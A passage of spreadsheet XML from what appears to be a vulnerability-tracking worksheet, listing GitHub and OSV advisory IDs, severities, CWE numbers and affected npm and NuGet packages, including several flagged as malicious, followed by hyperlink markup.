r="R2431"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2431" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16046</t></is></c></row><row r="2432"><c r="A2432" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2432" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2432" s="5" t="inlineStr"><is><t>GHSA-cc9r-2j5m-2m83</t></is></c><c r="D2432" s="5" t="inlineStr" /><c r="E2432" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F2432" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2432" s="5" t="inlineStr" /><c r="H2432" s="5" t="inlineStr" /><c r="I2432" s="5" t="inlineStr" /><c r="J2432" s="5" t="inlineStr" /><c r="K2432" s="5" t="inlineStr" /><c r="L2432" s="5" t="inlineStr"><is><t>npm:nodemailer</t></is></c><c r="M2432" s="5" t="inlineStr"><is><t>9.1.0</t></is></c><c r="N2432" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2432" s="5" t="inlineStr" /><c r="P2432" s="5" t="inlineStr" /><c r="Q2432" s="5" t="inlineStr"><is><t>CWE-20, CWE-436</t></is></c><c r="R2432"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S2432" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-cc9r-2j5m-2m83</t></is></c></row><row r="2433"><c r="A2433" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2433" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2433" s="5" t="inlineStr"><is><t>GHSA-cvhv-g4rq-3hmw</t></is></c><c r="D2433" s="5" t="inlineStr" /><c r="E2433" s="5" t="inlineStr" /><c r="F2433" s="5" t="inlineStr" /><c r="G2433" s="5" t="inlineStr" /><c r="H2433" s="5" t="inlineStr" /><c r="I2433" s="5" t="inlineStr" /><c r="J2433" s="5" t="inlineStr" /><c r="K2433" s="5" t="inlineStr" /><c r="L2433" s="5" t="inlineStr"><is><t>nuget:Magick.NET-Q16-AnyCPU, nuget:Magick.NET-Q16-HDRI-AnyCPU, nuget:Magick.NET-Q16-HDRI-OpenMP-arm64, nuget:Magick.NET-Q16-HDRI-arm64, nuget:Magick.NET-Q16-HDRI-x64, nuget:Magick.NET-Q16-HDRI-x86</t></is></c><c r="M2433" s="5" t="inlineStr"><is><t>14.15.0</t></is></c><c r="N2433" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O2433" s="5" t="inlineStr" /><c r="P2433" s="5" t="inlineStr" /><c r="Q2433" s="5" t="inlineStr"><is><t>CWE-401</t></is></c><c r="R2433" s="5" t="inlineStr"><is><t>A memory leak is possible when invalid options are passed to the cli (`magick`)</t></is></c><c r="S2433" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-cvhv-g4rq-3hmw</t></is></c></row><row r="2434"><c r="A2434" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2434" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2434" s="5" t="inlineStr"><is><t>GHSA-f4f2-cqqp-jcrx</t></is></c><c r="D2434" s="5" t="inlineStr" /><c r="E2434" s="5" t="inlineStr" /><c r="F2434" s="5" t="inlineStr" /><c r="G2434" s="5" t="inlineStr" /><c r="H2434" s="5" t="inlineStr" /><c r="I2434" s="5" t="inlineStr" /><c r="J2434" s="5" t="inlineStr" /><c r="K2434" s="5" t="inlineStr" /><c r="L2434" s="5" t="inlineStr"><is><t>npm:@web2apk/baileys</t></is></c><c r="M2434" s="5" t="inlineStr" /><c r="N2434" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O2434" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2434" s="5" t="inlineStr" /><c r="Q2434" s="5" t="inlineStr" /><c r="R2434"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2434" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16043</t></is></c></row><row r="2435"><c r="A2435" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2435" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2435" s="5" t="inlineStr"><is><t>GHSA-mqvm-gmc4-6rv2</t></is></c><c r="D2435" s="5" t="inlineStr" /><c r="E2435" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F2435" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2435" s="5" t="inlineStr" /><c r="H2435" s="5" t="inlineStr" /><c r="I2435" s="5" t="inlineStr" /><c r="J2435" s="5" t="inlineStr" /><c r="K2435" s="5" t="inlineStr" /><c r="L2435" s="5" t="inlineStr"><is><t>nuget:Microsoft.DiaSymReader.Native</t></is></c><c r="M2435" s="5" t="inlineStr"><is><t>18.9.0-beta1.26405.2</t></is></c><c r="N2435" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2435" s="5" t="inlineStr" /><c r="P2435" s="5" t="inlineStr" /><c r="Q2435" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R2435"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S2435" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-mqvm-gmc4-6rv2</t></is></c></row><row r="2436"><c r="A2436" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2436" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2436" s="5" t="inlineStr"><is><t>GHSA-q72m-f2r4-w4cw</t></is></c><c r="D2436" s="5" t="inlineStr" /><c r="E2436" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F2436" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2436" s="5" t="inlineStr" /><c r="H2436" s="5" t="inlineStr" /><c r="I2436" s="5" t="inlineStr" /><c r="J2436" s="5" t="inlineStr" /><c r="K2436" s="5" t="inlineStr" /><c r="L2436" s="5" t="inlineStr"><is><t>nuget:Microsoft.DiaSymReader.Native</t></is></c><c r="M2436" s="5" t="inlineStr"><is><t>18.9.0-beta1.26405.2</t></is></c><c r="N2436" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2436" s="5" t="inlineStr" /><c r="P2436" s="5" t="inlineStr" /><c r="Q2436" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R2436"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S2436" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-q72m-f2r4-w4cw</t></is></c></row><row r="2437"><c r="A2437" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2437" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2437" s="5" t="inlineStr"><is><t>GHSA-v3f6-m9j2-437p</t></is></c><c r="D2437" s="5" t="inlineStr" /><c r="E2437" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F2437" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2437" s="5" t="inlineStr" /><c r="H2437" s="5" t="inlineStr" /><c r="I2437" s="5" t="inlineStr" /><c r="J2437" s="5" t="inlineStr" /><c r="K2437" s="5" t="inlineStr" /><c r="L2437" s="5" t="inlineStr"><is><t>nuget:Microsoft.AspNetCore.Server.IISIntegration</t></is></c><c r="M2437" s="5" t="inlineStr"><is><t>10.0.12, 11.0.0-rc.1, 8.0.31, 9.0.20</t></is></c><c r="N2437" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2437" s="5" t="inlineStr" /><c r="P2437" s="5" t="inlineStr" /><c r="Q2437" s="5" t="inlineStr"><is><t>CWE-409</t></is></c><c r="R2437"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S2437" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-v3f6-m9j2-437p</t></is></c></row><row r="2438"><c r="A2438" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2438" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2438" s="5" t="inlineStr"><is><t>GHSA-wmmp-3585-3rmp</t></is></c><c r="D2438" s="5" t="inlineStr" /><c r="E2438" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F2438" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2438" s="5" t="inlineStr" /><c r="H2438" s="5" t="inlineStr" /><c r="I2438" s="5" t="inlineStr" /><c r="J2438" s="5" t="inlineStr" /><c r="K2438" s="5" t="inlineStr" /><c r="L2438" s="5" t="inlineStr"><is><t>npm:nodemailer</t></is></c><c r="M2438" s="5" t="inlineStr"><is><t>9.1.0</t></is></c><c r="N2438" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2438" s="5" t="inlineStr" /><c r="P2438" s="5" t="inlineStr" /><c r="Q2438" s="5" t="inlineStr"><is><t>CWE-20, CWE-436</t></is></c><c r="R2438"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S2438" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-wmmp-3585-3rmp</t></is></c></row><row r="2439"><c r="A2439" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2439" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2439" s="5" t="inlineStr"><is><t>MAL-2026-16048</t></is></c><c r="D2439" s="5" t="inlineStr" /><c r="E2439" s="5" t="inlineStr" /><c r="F2439" s="5" t="inlineStr" /><c r="G2439" s="5" t="inlineStr" /><c r="H2439" s="5" t="inlineStr" /><c r="I2439" s="5" t="inlineStr" /><c r="J2439" s="5" t="inlineStr" /><c r="K2439" s="5" t="inlineStr" /><c r="L2439" s="5" t="inlineStr"><is><t>npm:punypump</t></is></c><c r="M2439" s="5" t="inlineStr" /><c r="N2439" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O2439" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2439" s="5" t="inlineStr" /><c r="Q2439" s="5" t="inlineStr" /><c r="R2439"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S2439" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16048</t></is></c></row><row r="2440"><c r="A2440" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2440" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2440" s="5" t="inlineStr"><is><t>MAL-2026-16049</t></is></c><c r="D2440" s="5" t="inlineStr" /><c r="E2440" s="5" t="inlineStr" /><c r="F2440" s="5" t="inlineStr" /><c r="G2440" s="5" t="inlineStr" /><c r="H2440" s="5" t="inlineStr" /><c r="I2440" s="5" t="inlineStr" /><c r="J2440" s="5" t="inlineStr" /><c r="K2440" s="5" t="inlineStr" /><c r="L2440" s="5" t="inlineStr"><is><t>npm:tailwindcss-aspectratio-styles</t></is></c><c r="M2440" s="5" t="inlineStr" /><c r="N2440" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O2440" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2440" s="5" t="inlineStr" /><c r="Q2440" s="5" t="inlineStr" /><c r="R2440"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S2440" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16049</t></is></c></row><row r="2441"><c r="A2441" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2441" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2441" s="5" t="inlineStr"><is><t>MAL-2026-16050</t></is></c><c r="D2441" s="5" t="inlineStr" /><c r="E2441" s="5" t="inlineStr" /><c r="F2441" s="5" t="inlineStr" /><c r="G2441" s="5" t="inlineStr" /><c r="H2441" s="5" t="inlineStr" /><c r="I2441" s="5" t="inlineStr" /><c r="J2441" s="5" t="inlineStr" /><c r="K2441" s="5" t="inlineStr" /><c r="L2441" s="5" t="inlineStr"><is><t>npm:@aspect-adv-ui/consent-manager</t></is></c><c r="M2441" s="5" t="inlineStr" /><c r="N2441" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O2441" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2441" s="5" t="inlineStr" /><c r="Q2441" s="5" t="inlineStr" /><c r="R2441"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S2441" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16050</t></is></c></row><row r="2442"><c r="A2442" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2442" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2442" s="5" t="inlineStr"><is><t>MAL-2026-16051</t></is></c><c r="D2442" s="5" t="inlineStr" /><c r="E2442" s="5" t="inlineStr" /><c r="F2442" s="5" t="inlineStr" /><c r="G2442" s="5" t="inlineStr" /><c r="H2442" s="5" t="inlineStr" /><c r="I2442" s="5" t="inlineStr" /><c r="J2442" s="5" t="inlineStr" /><c r="K2442" s="5" t="inlineStr" /><c r="L2442" s="5" t="inlineStr"><is><t>npm:@umschool/analytics</t></is></c><c r="M2442" s="5" t="inlineStr" /><c r="N2442" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O2442" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2442" s="5" t="inlineStr" /><c r="Q2442" s="5" t="inlineStr" /><c r="R2442"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S2442" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16051</t></is></c></row><row r="2443"><c r="A2443" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2443" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2443" s="5" t="inlineStr"><is><t>MAL-2026-16052</t></is></c><c r="D2443" s="5" t="inlineStr" /><c r="E2443" s="5" t="inlineStr" /><c r="F2443" s="5" t="inlineStr" /><c r="G2443" s="5" t="inlineStr" /><c r="H2443" s="5" t="inlineStr" /><c r="I2443" s="5" t="inlineStr" /><c r="J2443" s="5" t="inlineStr" /><c r="K2443" s="5" t="inlineStr" /><c r="L2443" s="5" t="inlineStr"><is><t>npm:open-item-validator</t></is></c><c r="M2443" s="5" t="inlineStr" /><c r="N2443" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O2443" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2443" s="5" t="inlineStr" /><c r="Q2443" s="5" t="inlineStr" /><c r="R2443"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S2443" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16052</t></is></c></row><row r="2444"><c r="A2444" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2444" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2444" s="5" t="inlineStr"><is><t>MAL-2026-16056</t></is></c><c r="D2444" s="5" t="inlineStr" /><c r="E2444" s="5" t="inlineStr" /><c r="F2444" s="5" t="inlineStr" /><c r="G2444" s="5" t="inlineStr" /><c r="H2444" s="5" t="inlineStr" /><c r="I2444" s="5" t="inlineStr" /><c r="J2444" s="5" t="inlineStr" /><c r="K2444" s="5" t="inlineStr" /><c r="L2444" s="5" t="inlineStr"><is><t>npm:tailwind-aspect-styles</t></is></c><c r="M2444" s="5" t="inlineStr" /><c r="N2444" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O2444" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2444" s="5" t="inlineStr" /><c r="Q2444" s="5" t="inlineStr" /><c r="R2444"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S2444" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16056</t></is></c></row><row r="2445"><c r="A2445" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2445" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2445" s="5" t="inlineStr"><is><t>MAL-2026-16057</t></is></c><c r="D2445" s="5" t="inlineStr" /><c r="E2445" s="5" t="inlineStr" /><c r="F2445" s="5" t="inlineStr" /><c r="G2445" s="5" t="inlineStr" /><c r="H2445" s="5" t="inlineStr" /><c r="I2445" s="5" t="inlineStr" /><c r="J2445" s="5" t="inlineStr" /><c r="K2445" s="5" t="inlineStr" /><c r="L2445" s="5" t="inlineStr"><is><t>npm:toru-ultimate</t></is></c><c r="M2445" s="5" t="inlineStr" /><c r="N2445" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O2445" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2445" s="5" t="inlineStr" /><c r="Q2445" s="5" t="inlineStr" /><c r="R2445"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S2445" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16057</t></is></c></row><row r="2446"><c r="A2446" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2446" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2446" s="5" t="inlineStr"><is><t>MAL-2026-16058</t></is></c><c r="D2446" s="5" t="inlineStr" /><c r="E2446" s="5" t="inlineStr" /><c r="F2446" s="5" t="inlineStr" /><c r="G2446" s="5" t="inlineStr" /><c r="H2446" s="5" t="inlineStr" /><c r="I2446" s="5" t="inlineStr" /><c r="J2446" s="5" t="inlineStr" /><c r="K2446" s="5" t="inlineStr" /><c r="L2446" s="5" t="inlineStr"><is><t>npm:vinzz-wcli</t></is></c><c r="M2446" s="5" t="inlineStr" /><c r="N2446" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O2446" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2446" s="5" t="inlineStr" /><c r="Q2446" s="5" t="inlineStr" /><c r="R2446"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S2446" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16058</t></is></c></row><row r="2447"><c r="A2447" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2447" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2447" s="5" t="inlineStr"><is><t>MAL-2026-16199</t></is></c><c r="D2447" s="5" t="inlineStr" /><c r="E2447" s="5" t="inlineStr" /><c r="F2447" s="5" t="inlineStr" /><c r="G2447" s="5" t="inlineStr" /><c r="H2447" s="5" t="inlineStr" /><c r="I2447" s="5" t="inlineStr" /><c r="J2447" s="5" t="inlineStr" /><c r="K2447" s="5" t="inlineStr" /><c r="L2447" s="5" t="inlineStr"><is><t>npm:plogme</t></is></c><c r="M2447" s="5" t="inlineStr" /><c r="N2447" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O2447" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2447" s="5" t="inlineStr" /><c r="Q2447" s="5" t="inlineStr" /><c r="R2447"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S2447" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16199</t></is></c></row></sheetData><autoFilter ref="A1:S2447" /><conditionalFormatting sqref="E2:E2447"><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2447"><cfRule type="cellIs" priority="5" operator="equal" dxfId="4"><formula>"Yes"</formula></cfRule></conditionalFormatting><hyperlinks><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 xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1132" r:id="rId1131" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1133" r:id="rId1132" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1134" r:id="rId1133" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1135" r:id="rId1134" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1136" r:id="rId1135" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1137" r:id="rId1136" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1138" r:id="rId1137" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1139" r:id="rId1138" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1140" r:id="rId1139" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1141" r:id="rId1140" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1142" r:id="rId1141" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1143" r:id="rId1142" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1144" r:id="rId1143" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1145" r:id="rId1144" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1146" r:id="rId1145" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1147" r:id="rId1146" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1148" r:id="rId1147" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1149" r:id="rId1148" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1150" r:id="rId1149" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1151" r:id="rId1150" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1152" r:id="rId1151" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1153" r:id="rId1152" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1154" r:id="rId1153" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1155" r:id="rId1154" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1156" r:id="rId1155" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1157" r:id="rId1156" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1158" r:id="rId1157" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1159" r:id="rId1158" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1160" r:id="rId1159" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1161" r:id="rId1160" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1162" r:id="rId1161" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1163" r:id="rId1162" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1164" r:id="rId1163" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1165" r:id="rId1164" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1166" r:id="rId1165" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1167" r:id="rId1166" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1168" r:id="rId1167" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1169" r:id="rId1168" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1170" r:id="rId1169" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1171" r:id="rId1170" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1172" r:id="rId1171" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1173" r:id="rId1172" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1174" r:id="rId1173" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1175" r:id="rId1174" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1176" r:id="rId1175" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1177" r:id="rId1176" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1178" r:id="rId1177" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1179" r:id="rId1178" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1180" r:id="rId1179" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1181" r:id="rId1180" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1182" r:id="rId1181" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1183" r:id="rId1182" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1184" r:id="rId1183" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1185" r:id="rId1184" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1186" r:id="rId1185" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1187" r:id="rId1186" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1188" r:id="rId1187" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1189" r:id="rId1188" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1190" r:id="rId1189" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1191" r:id="rId1190" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1192" r:id="rId1191" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1193" r:id="rId1192" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1194" r:id="rId1193" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1195" r:id="rId1194" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1196" r:id="rId1195" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1197" r:id="rId1196" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1198" r:id="rId1197" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1199" r:id="rId1198" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1200" r:id="rId1199" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1201" r:id="rId1200" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1202" r:id="rId1201" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1203" r:id="rId1202" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1204" r:id="rId1203" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1205" r:id="rId1204" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1206" r:id="rId1205" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1207" r:id="rId1206" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1208" r:id="rId1207" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1209" r:id="rId1208" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1210" r:id="rId1209" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1211" r:id="rId1210" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1212" r:id="rId1211" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1213" r:id="rId1212" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1214" r:id="rId1213" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1215" r:id="rId1214" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1216" r:id="rId1215" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1217" r:id="rId1216" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1218" r:id="rId1217" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1219" r:id="rId1218" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1220" r:id="rId1219" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1221" r:id="rId1220" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1222" r:id="rId1221" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1223" r:id="rId1222" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1224" r:id="rId1223" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1225" r:id="rId1224" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1226" r:id="rId1225" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1227" r:id="rId1226" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1228" r:id="rId1227" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1229" r:id="rId1228" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1230" r:id="rId1229" /><hyperlink 